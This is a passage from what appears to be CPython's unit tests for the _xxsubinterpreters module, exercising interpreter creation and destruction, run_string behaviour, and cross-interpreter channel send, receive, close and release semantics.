interpreters.destroy(id)
with self.assertRaises(RuntimeError):
interpreters.destroy(id)
def test_does_not_exist(self):
with self.assertRaises(RuntimeError):
interpreters.destroy(1_000_000)
def test_bad_id(self):
with self.assertRaises(ValueError):
interpreters.destroy(-1)
def test_from_current(self):
main, = interpreters.list_all()
id = interpreters.create()
script = dedent(f"""
import _xxsubinterpreters as _interpreters
try:
_interpreters.destroy({id})
except RuntimeError:
pass
""")
interpreters.run_string(id, script)
self.assertEqual(set(interpreters.list_all()), {main, id})
def test_from_sibling(self):
main, = interpreters.list_all()
id1 = interpreters.create()
id2 = interpreters.create()
script = dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.destroy({id2})
""")
interpreters.run_string(id1, script)
self.assertEqual(set(interpreters.list_all()), {main, id1})
def test_from_other_thread(self):
id = interpreters.create()
def f():
interpreters.destroy(id)
t = threading.Thread(target=f)
t.start()
t.join()
def test_still_running(self):
main, = interpreters.list_all()
interp = interpreters.create()
with _running(interp):
self.assertTrue(interpreters.is_running(interp),
msg=f"Interp {interp} should be running before destruction.")
with self.assertRaises(RuntimeError,
msg=f"Should not be able to destroy interp {interp} while it's still running."):
interpreters.destroy(interp)
self.assertTrue(interpreters.is_running(interp))
class RunStringTests(TestBase):
def setUp(self):
super().setUp()
self.id = interpreters.create()
def test_success(self):
script, file = _captured_script('print("it worked!", end="")')
with file:
interpreters.run_string(self.id, script)
out = file.read()
self.assertEqual(out, 'it worked!')
def test_in_thread(self):
script, file = _captured_script('print("it worked!", end="")')
with file:
def f():
interpreters.run_string(self.id, script)
t = threading.Thread(target=f)
t.start()
t.join()
out = file.read()
self.assertEqual(out, 'it worked!')
def test_create_thread(self):
subinterp = interpreters.create(isolated=False)
script, file = _captured_script("""
import threading
def f():
print('it worked!', end='')
t = threading.Thread(target=f)
t.start()
t.join()
""")
with file:
interpreters.run_string(subinterp, script)
out = file.read()
self.assertEqual(out, 'it worked!')
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
def test_fork(self):
import tempfile
with tempfile.NamedTemporaryFile('w+') as file:
file.write('')
file.flush()
expected = 'spam spam spam spam spam'
script = dedent(f"""
import os
try:
os.fork()
except RuntimeError:
with open('{file.name}', 'w') as out:
out.write('{expected}')
""")
interpreters.run_string(self.id, script)
file.seek(0)
content = file.read()
self.assertEqual(content, expected)
def test_already_running(self):
with _running(self.id):
with self.assertRaises(RuntimeError):
interpreters.run_string(self.id, 'print("spam")')
def test_does_not_exist(self):
id = 0
while id in interpreters.list_all():
id += 1
with self.assertRaises(RuntimeError):
interpreters.run_string(id, 'print("spam")')
def test_error_id(self):
with self.assertRaises(ValueError):
interpreters.run_string(-1, 'print("spam")')
def test_bad_id(self):
with self.assertRaises(TypeError):
interpreters.run_string('spam', 'print("spam")')
def test_bad_script(self):
with self.assertRaises(TypeError):
interpreters.run_string(self.id, 10)
def test_bytes_for_script(self):
with self.assertRaises(TypeError):
interpreters.run_string(self.id, b'print("spam")')
@contextlib.contextmanager
def assert_run_failed(self, exctype, msg=None):
with self.assertRaises(interpreters.RunFailedError) as caught:
yield
if msg is None:
self.assertEqual(str(caught.exception).split(':')[0],
str(exctype))
else:
self.assertEqual(str(caught.exception),
"{}: {}".format(exctype, msg))
def test_invalid_syntax(self):
with self.assert_run_failed(SyntaxError):
# missing close paren
interpreters.run_string(self.id, 'print("spam"')
def test_failure(self):
with self.assert_run_failed(Exception, 'spam'):
interpreters.run_string(self.id, 'raise Exception("spam")')
def test_SystemExit(self):
with self.assert_run_failed(SystemExit, '42'):
interpreters.run_string(self.id, 'raise SystemExit(42)')
def test_sys_exit(self):
with self.assert_run_failed(SystemExit):
interpreters.run_string(self.id, dedent("""
import sys
sys.exit()
"""))
with self.assert_run_failed(SystemExit, '42'):
interpreters.run_string(self.id, dedent("""
import sys
sys.exit(42)
"""))
def test_with_shared(self):
r, w = os.pipe()
shared = {
'spam': b'ham',
'eggs': b'-1',
'cheddar': None,
}
script = dedent(f"""
eggs = int(eggs)
spam = 42
result = spam + eggs
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script, shared)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['spam'], 42)
self.assertEqual(ns['eggs'], -1)
self.assertEqual(ns['result'], 41)
self.assertIsNone(ns['cheddar'])
def test_shared_overwrites(self):
interpreters.run_string(self.id, dedent("""
spam = 'eggs'
ns1 = dict(vars())
del ns1['__builtins__']
"""))
shared = {'spam': b'ham'}
script = dedent(f"""
ns2 = dict(vars())
del ns2['__builtins__']
""")
interpreters.run_string(self.id, script, shared)
r, w = os.pipe()
script = dedent(f"""
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['ns1']['spam'], 'eggs')
self.assertEqual(ns['ns2']['spam'], b'ham')
self.assertEqual(ns['spam'], b'ham')
def test_shared_overwrites_default_vars(self):
r, w = os.pipe()
shared = {'__name__': b'not __main__'}
script = dedent(f"""
spam = 42
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script, shared)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['__name__'], b'not __main__')
def test_main_reused(self):
r, w = os.pipe()
interpreters.run_string(self.id, dedent(f"""
spam = True
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
del ns, pickle, chan
"""))
with open(r, 'rb') as chan:
ns1 = pickle.load(chan)
r, w = os.pipe()
interpreters.run_string(self.id, dedent(f"""
eggs = False
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
"""))
with open(r, 'rb') as chan:
ns2 = pickle.load(chan)
self.assertIn('spam', ns1)
self.assertNotIn('eggs', ns1)
self.assertIn('eggs', ns2)
self.assertIn('spam', ns2)
def test_execution_namespace_is_main(self):
r, w = os.pipe()
script = dedent(f"""
spam = 42
ns = dict(vars())
ns['__builtins__'] = str(ns['__builtins__'])
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
ns.pop('__builtins__')
ns.pop('__loader__')
self.assertEqual(ns, {
'__name__': '__main__',
'__annotations__': {},
'__doc__': None,
'__package__': None,
'__spec__': None,
'spam': 42,
})
# XXX Fix this test!
@unittest.skip('blocking forever')
def test_still_running_at_exit(self):
script = dedent(f"""
from textwrap import dedent
import threading
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
def f():
_interpreters.run_string(id, dedent('''
import time
# Give plenty of time for the main interpreter to finish.
time.sleep(1_000_000)
'''))
t = threading.Thread(target=f)
t.start()
""")
with support.temp_dir() as dirname:
filename = script_helper.make_script(dirname, 'interp', script)
with script_helper.spawn_python(filename) as proc:
retcode = proc.wait()
self.assertEqual(retcode, 0)
##################################
# channel tests
class ChannelIDTests(TestBase):
def test_default_kwargs(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(int(cid), 10)
self.assertEqual(cid.end, 'both')
def test_with_kwargs(self):
cid = interpreters._channel_id(10, send=True, force=True)
self.assertEqual(cid.end, 'send')
cid = interpreters._channel_id(10, send=True, recv=False, force=True)
self.assertEqual(cid.end, 'send')
cid = interpreters._channel_id(10, recv=True, force=True)
self.assertEqual(cid.end, 'recv')
cid = interpreters._channel_id(10, recv=True, send=False, force=True)
self.assertEqual(cid.end, 'recv')
cid = interpreters._channel_id(10, send=True, recv=True, force=True)
self.assertEqual(cid.end, 'both')
def test_coerce_id(self):
class Int(str):
def __index__(self):
return 10
cid = interpreters._channel_id(Int(), force=True)
self.assertEqual(int(cid), 10)
def test_bad_id(self):
self.assertRaises(TypeError, interpreters._channel_id, object())
self.assertRaises(TypeError, interpreters._channel_id, 10.0)
self.assertRaises(TypeError, interpreters._channel_id, '10')
self.assertRaises(TypeError, interpreters._channel_id, b'10')
self.assertRaises(ValueError, interpreters._channel_id, -1)
self.assertRaises(OverflowError, interpreters._channel_id, 2**64)
def test_bad_kwargs(self):
with self.assertRaises(ValueError):
interpreters._channel_id(10, send=False, recv=False)
def test_does_not_exist(self):
cid = interpreters.channel_create()
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters._channel_id(int(cid) + 1) # unforced
def test_str(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(str(cid), '10')
def test_repr(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(repr(cid), 'ChannelID(10)')
cid = interpreters._channel_id(10, send=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10, send=True)')
cid = interpreters._channel_id(10, recv=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10, recv=True)')
cid = interpreters._channel_id(10, send=True, recv=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10)')
def test_equality(self):
cid1 = interpreters.channel_create()
cid2 = interpreters._channel_id(int(cid1))
cid3 = interpreters.channel_create()
self.assertTrue(cid1 == cid1)
self.assertTrue(cid1 == cid2)
self.assertTrue(cid1 == int(cid1))
self.assertTrue(int(cid1) == cid1)
self.assertTrue(cid1 == float(int(cid1)))
self.assertTrue(float(int(cid1)) == cid1)
self.assertFalse(cid1 == float(int(cid1)) + 0.1)
self.assertFalse(cid1 == str(int(cid1)))
self.assertFalse(cid1 == 2**1000)
self.assertFalse(cid1 == float('inf'))
self.assertFalse(cid1 == 'spam')
self.assertFalse(cid1 == cid3)
self.assertFalse(cid1 != cid1)
self.assertFalse(cid1 != cid2)
self.assertTrue(cid1 != cid3)
class ChannelTests(TestBase):
def test_create_cid(self):
cid = interpreters.channel_create()
self.assertIsInstance(cid, interpreters.ChannelID)
def test_sequential_ids(self):
before = interpreters.channel_list_all()
id1 = interpreters.channel_create()
id2 = interpreters.channel_create()
id3 = interpreters.channel_create()
after = interpreters.channel_list_all()
self.assertEqual(id2, int(id1) + 1)
self.assertEqual(id3, int(id2) + 1)
self.assertEqual(set(after) - set(before), {id1, id2, id3})
def test_ids_global(self):
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
print(cid)
"""))
cid1 = int(out.strip())
id2 = interpreters.create()
out = _run_output(id2, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
print(cid)
"""))
cid2 = int(out.strip())
self.assertEqual(cid2, int(cid1) + 1)
def test_channel_list_interpreters_none(self):
"""Test listing interpreters for a channel with no associations."""
# Test for channel with no associated interpreters.
cid = interpreters.channel_create()
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(send_interps, [])
self.assertEqual(recv_interps, [])
def test_channel_list_interpreters_basic(self):
"""Test basic listing channel interpreters."""
interp0 = interpreters.get_main()
cid = interpreters.channel_create()
interpreters.channel_send(cid, "send")
# Test for a channel that has one end associated to an interpreter.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(send_interps, [interp0])
self.assertEqual(recv_interps, [])
interp1 = interpreters.create()
_run_output(interp1, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
# Test for a channel that has both ends associated with an interpreter.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(send_interps, [interp0])
self.assertEqual(recv_interps, [interp1])
def test_channel_list_interpreters_multiple(self):
"""Test listing interpreters for a channel with many associations."""
interp0 = interpreters.get_main()
interp1 = interpreters.create()
interp2 = interpreters.create()
interp3 = interpreters.create()
cid = interpreters.channel_create()
interpreters.channel_send(cid, "send")
_run_output(interp1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, "send")
"""))
_run_output(interp2, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
_run_output(interp3, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(set(send_interps), {interp0, interp1})
self.assertEqual(set(recv_interps), {interp2, interp3})
def test_channel_list_interpreters_destroyed(self):
"""Test listing channel interpreters with a destroyed interpreter."""
interp0 = interpreters.get_main()
interp1 = interpreters.create()
cid = interpreters.channel_create()
interpreters.channel_send(cid, "send")
_run_output(interp1, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
# Should be one interpreter associated with each end.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(send_interps, [interp0])
self.assertEqual(recv_interps, [interp1])
interpreters.destroy(interp1)
# Destroyed interpreter should not be listed.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(send_interps, [interp0])
self.assertEqual(recv_interps, [])
def test_channel_list_interpreters_released(self):
"""Test listing channel interpreters with a released channel."""
# Set up one channel with main interpreter on the send end and two
# subinterpreters on the receive end.
interp0 = interpreters.get_main()
interp1 = interpreters.create()
interp2 = interpreters.create()
cid = interpreters.channel_create()
interpreters.channel_send(cid, "data")
_run_output(interp1, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
interpreters.channel_send(cid, "data")
_run_output(interp2, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
# Check the setup.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(send_interps), 1)
self.assertEqual(len(recv_interps), 2)
# Release the main interpreter from the send end.
interpreters.channel_release(cid, send=True)
# Send end should have no associated interpreters.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(send_interps), 0)
self.assertEqual(len(recv_interps), 2)
# Release one of the subinterpreters from the receive end.
_run_output(interp2, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_release({cid})
"""))
# Receive end should have the released interpreter removed.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(send_interps), 0)
self.assertEqual(recv_interps, [interp1])
def test_channel_list_interpreters_closed(self):
"""Test listing channel interpreters with a closed channel."""
interp0 = interpreters.get_main()
interp1 = interpreters.create()
cid = interpreters.channel_create()
# Put something in the channel so that it's not empty.
interpreters.channel_send(cid, "send")
# Check initial state.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(send_interps), 1)
self.assertEqual(len(recv_interps), 0)
# Force close the channel.
interpreters.channel_close(cid, force=True)
# Both ends should raise an error.
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=False)
def test_channel_list_interpreters_closed_send_end(self):
"""Test listing channel interpreters with a channel's send end closed."""
interp0 = interpreters.get_main()
interp1 = interpreters.create()
cid = interpreters.channel_create()
# Put something in the channel so that it's not empty.
interpreters.channel_send(cid, "send")
# Check initial state.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(send_interps), 1)
self.assertEqual(len(recv_interps), 0)
# Close the send end of the channel.
interpreters.channel_close(cid, send=True)
# Send end should raise an error.
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=True)
# Receive end should not be closed (since channel is not empty).
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(recv_interps), 0)
# Close the receive end of the channel from a subinterpreter.
_run_output(interp1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_close({cid}, force=True)
"""))
# Both ends should raise an error.
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=False)
####################
def test_send_recv_main(self):
cid = interpreters.channel_create()
orig = b'spam'
interpreters.channel_send(cid, orig)
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, orig)
self.assertIsNot(obj, orig)
def test_send_recv_same_interpreter(self):
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
orig = b'spam'
_interpreters.channel_send(cid, orig)
obj = _interpreters.channel_recv(cid)
assert obj is not orig
assert obj == orig
"""))
def test_send_recv_different_interpreters(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
out = _run_output(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
def test_send_recv_different_threads(self):
cid = interpreters.channel_create()
def f():
while True:
try:
obj = interpreters.channel_recv(cid)
break
except interpreters.ChannelEmptyError:
time.sleep(0.1)
interpreters.channel_send(cid, obj)
t = threading.Thread(target=f)
t.start()
interpreters.channel_send(cid, b'spam')
t.join()
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
def test_send_recv_different_interpreters_and_threads(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
out = None
def f():
nonlocal out
out = _run_output(id1, dedent(f"""
import time
import _xxsubinterpreters as _interpreters
while True:
try:
obj = _interpreters.channel_recv({cid})
break
except _interpreters.ChannelEmptyError:
time.sleep(0.1)
assert obj == b'spam'
_interpreters.channel_send({cid}, b'eggs')
"""))
t = threading.Thread(target=f)
t.start()
interpreters.channel_send(cid, b'spam')
t.join()
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'eggs')
def test_send_not_found(self):
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters.channel_send(10, b'spam')
def test_recv_not_found(self):
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters.channel_recv(10)
def test_recv_empty(self):
cid = interpreters.channel_create()
with self.assertRaises(interpreters.ChannelEmptyError):
interpreters.channel_recv(cid)
def test_recv_default(self):
default = object()
cid = interpreters.channel_create()
obj1 = interpreters.channel_recv(cid, default)
interpreters.channel_send(cid, None)
interpreters.channel_send(cid, 1)
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'eggs')
obj2 = interpreters.channel_recv(cid, default)
obj3 = interpreters.channel_recv(cid, default)
obj4 = interpreters.channel_recv(cid)
obj5 = interpreters.channel_recv(cid, default)
obj6 = interpreters.channel_recv(cid, default)
self.assertIs(obj1, default)
self.assertIs(obj2, None)
self.assertEqual(obj3, 1)
self.assertEqual(obj4, b'spam')
self.assertEqual(obj5, b'eggs')
self.assertIs(obj6, default)
def test_run_string_arg_unresolved(self):
cid = interpreters.channel_create()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
print(cid.end)
_interpreters.channel_send(cid, b'spam')
"""),
dict(cid=cid.send))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
self.assertEqual(out.strip(), 'send')
# XXX For now there is no high-level channel into which the
# sent channel ID can be converted...
# Note: this test caused crashes on some buildbots (bpo-33615).
@unittest.skip('disabled until high-level channels exist')
def test_run_string_arg_resolved(self):
cid = interpreters.channel_create()
cid = interpreters._channel_id(cid, _resolve=True)
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
print(chan.id.end)
_interpreters.channel_send(chan.id, b'spam')
"""),
dict(chan=cid.send))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
self.assertEqual(out.strip(), 'send')
# close
def test_close_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_multiple_users(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
id2 = interpreters.create()
interpreters.run_string(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
interpreters.run_string(id2, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_recv({cid})
"""))
interpreters.channel_close(cid)
with self.assertRaises(interpreters.RunFailedError) as cm:
interpreters.run_string(id1, dedent(f"""
_interpreters.channel_send({cid}, b'spam')
"""))
self.assertIn('ChannelClosedError', str(cm.exception))
with self.assertRaises(interpreters.RunFailedError) as cm:
interpreters.run_string(id2, dedent(f"""
_interpreters.channel_send({cid}, b'spam')
"""))
self.assertIn('ChannelClosedError', str(cm.exception))
def test_close_multiple_times(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(cid)
def test_close_empty(self):
tests = [
(False, False),
(True, False),
(False, True),
(True, True),
]
for send, recv in tests:
with self.subTest((send, recv)):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid, send=send, recv=recv)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_defaults_with_unused_items(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
def test_close_recv_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid, recv=True)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
interpreters.channel_close(cid, recv=True)
def test_close_send_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_both_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid, recv=True, send=True)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
interpreters.channel_close(cid, recv=True)
def test_close_recv_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, recv=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_send_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_both_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True, recv=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_never_used(self):
cid = interpreters.channel_create()
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_by_unassociated_interp(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_close({cid}, force=True)
"""))
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(cid)
def test_close_used_multiple_times_by_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_channel_list_interpreters_invalid_channel(self):
cid = interpreters.channel_create()
# Test for invalid channel ID.
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters.channel_list_interpreters(1000, send=True)
interpreters.channel_close(cid)
# Test for a channel that has been closed.
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=True)
def test_channel_list_interpreters_invalid_args(self):
# Tests for invalid arguments passed to the API.
cid = interpreters.channel_create()
with self.assertRaises(TypeError):
interpreters.channel_list_interpreters(cid)
class ChannelReleaseTests(TestBase):
# XXX Add more test coverage a la the tests for close().
"""
- main / interp / other
- run in: current thread / new thread / other thread / different threads
- end / opposite
- force / no force
- used / not used (associated / not associated)
- empty / emptied / never emptied / partly emptied
- closed / not closed
- released / not released
- creator (interp) / other
- associated interpreter not running
- associated interpreter destroyed
"""
"""
use
pre-release
release
after
check
"""
"""
release in: main, interp1
creator: same, other (incl. interp2)
use: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
pre-release: None,send,recv,both in None,same,other(incl. interp2),same+other(incl. interp2),all
pre-release forced: None,send,recv,both in None,same,other(incl. interp2),same+other(incl. interp2),all
release: same
release forced: same
use after: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
release after: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
check released: send/recv for same/other(incl. interp2)
check closed: send/recv for same/other(incl. interp2)
"""
def test_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_multiple_users(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
id2 = interpreters.create()
interpreters.run_string(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
out = _run_output(id2, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
_interpreters.channel_release({cid})
print(repr(obj))
"""))
interpreters.run_string(id1, dedent(f"""
_interpreters.channel_release({cid})
"""))
self.assertEqual(out.strip(), "b'spam'")
def test_no_kwargs(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_multiple_times(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_release(cid, send=True, recv=True)
def test_with_unused_items(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_never_used(self):
cid = interpreters.channel_create()
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_by_unassociated_interp(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_release({cid})
"""))
obj = interpreters.channel_recv(cid)
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
self.assertEqual(obj, b'spam')
def test_close_if_unassociated(self):
# XXX Something's not right with this test...
cid = interpreters.channel_create()
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_send({cid}, b'spam')
_interpreters.channel_release({cid})
"""))
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_partially(self):
# XXX Is partial close too weird/confusing?
cid = interpreters.channel_create()
